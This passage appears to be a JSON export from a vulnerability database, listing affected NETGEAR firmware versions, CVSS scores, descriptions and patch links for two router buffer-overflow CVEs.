"version": "1.0.4.12"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.4"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.9.4"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.12"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52563"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"db": "NVD",
"id": "CVE-2017-18744"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
}
]
},
"cve": "CVE-2017-18744",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2017-18744",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014879",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2021-52563",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18744",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18744",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014879",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18744",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18744",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014879",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-52563",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1986",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52563"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1986"
},
{
"db": "NVD",
"id": "CVE-2017-18744"
},
{
"db": "NVD",
"id": "CVE-2017-18744"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000 before 1.0.9.4, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.74. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18744"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"db": "CNVD",
"id": "CNVD-2021-52563"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18744",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014879",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-52563",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1986",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52563"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1986"
},
{
"db": "NVD",
"id": "CVE-2017-18744"
}
]
},
"id": "VAR-202004-1348",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52563"
}
],
"trust": 1.06542761125
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52563"
}
]
},
"last_update_date": "2024-11-23T22:51:26.806000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2017-0324",
"trust": 0.8,
"url": "https://kb.netgear.com/000051511/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2017-0324"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-52563)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/279646"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116749"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52563"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1986"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"db": "NVD",
"id": "CVE-2017-18744"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18744"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051511/security-advisory-for-pre-authentication-buffer-overflow-on-some-routers-psv-2017-0324"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18744"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52563"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1986"
},
{
"db": "NVD",
"id": "CVE-2017-18744"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-52563"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1986"
},
{
"db": "NVD",
"id": "CVE-2017-18744"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-52563"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"date": "2020-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1986"
},
{
"date": "2020-04-23T16:15:12.680000",
"db": "NVD",
"id": "CVE-2017-18744"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-52563"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014879"
},
{
"date": "2020-04-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1986"
},
{
"date": "2024-11-21T03:20:49",
"db": "NVD",
"id": "CVE-2017-18744"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1986"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Classic buffer overflow vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014879"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1986"
}
],
"trust": 0.6
}
}
var-202004-0775
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D8500 before 1.0.3.44, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, and R8500 before 1.0.2.128. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D8500, etc. are all products of NETGEAR. NETGEAR D8500 is a wireless modem. NETGEAR R6250 is a wireless router. NETGEAR R6300 is a wireless router. The vulnerability stems from the fact that the network system or product performs an operation on the memory, and the data boundary is not correctly verified, resulting in an incorrect read and write operation to other associated memory locations. The attacker The vulnerability can be exploited to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0775",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.6"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.8"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.1.30"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.1.30"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.128"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.128"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.42"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.6"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.9.42"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.32"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30684"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"db": "NVD",
"id": "CVE-2019-20713"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7100lg_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Wayne Low of Fortinets FortiGuard Labs",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1297"
}
],
"trust": 0.6
},
"cve": "CVE-2019-20713",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CVE-2019-20713",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.2,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015462",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CNVD-2020-30684",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2019-20713",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2019-20713",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.8,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015462",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20713",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20713",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015462",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-30684",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1297",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30684"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1297"
},
{
"db": "NVD",
"id": "CVE-2019-20713"
},
{
"db": "NVD",
"id": "CVE-2019-20713"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D8500 before 1.0.3.44, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, and R8500 before 1.0.2.128. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D8500, etc. are all products of NETGEAR. NETGEAR D8500 is a wireless modem. NETGEAR R6250 is a wireless router. NETGEAR R6300 is a wireless router. The vulnerability stems from the fact that the network system or product performs an operation on the memory, and the data boundary is not correctly verified, resulting in an incorrect read and write operation to other associated memory locations. The attacker The vulnerability can be exploited to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20713"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"db": "CNVD",
"id": "CNVD-2020-30684"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20713",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015462",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-30684",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1297",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30684"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1297"
},
{
"db": "NVD",
"id": "CVE-2019-20713"
}
]
},
"id": "VAR-202004-0775",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
